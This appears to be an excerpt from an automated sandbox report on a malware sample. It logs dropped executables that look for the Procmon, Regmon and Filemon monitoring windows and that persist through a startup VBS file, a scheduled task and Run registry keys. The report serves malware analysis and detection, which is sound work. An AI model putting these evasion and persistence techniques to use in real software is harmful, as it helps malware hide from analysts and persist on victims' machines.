                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbsJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 24da741fb6.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 24da741fb6.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d8313073f.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d8313073f.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 203f60e481.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 203f60e481.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8a0ff7e068.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8a0ff7e068.exeJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
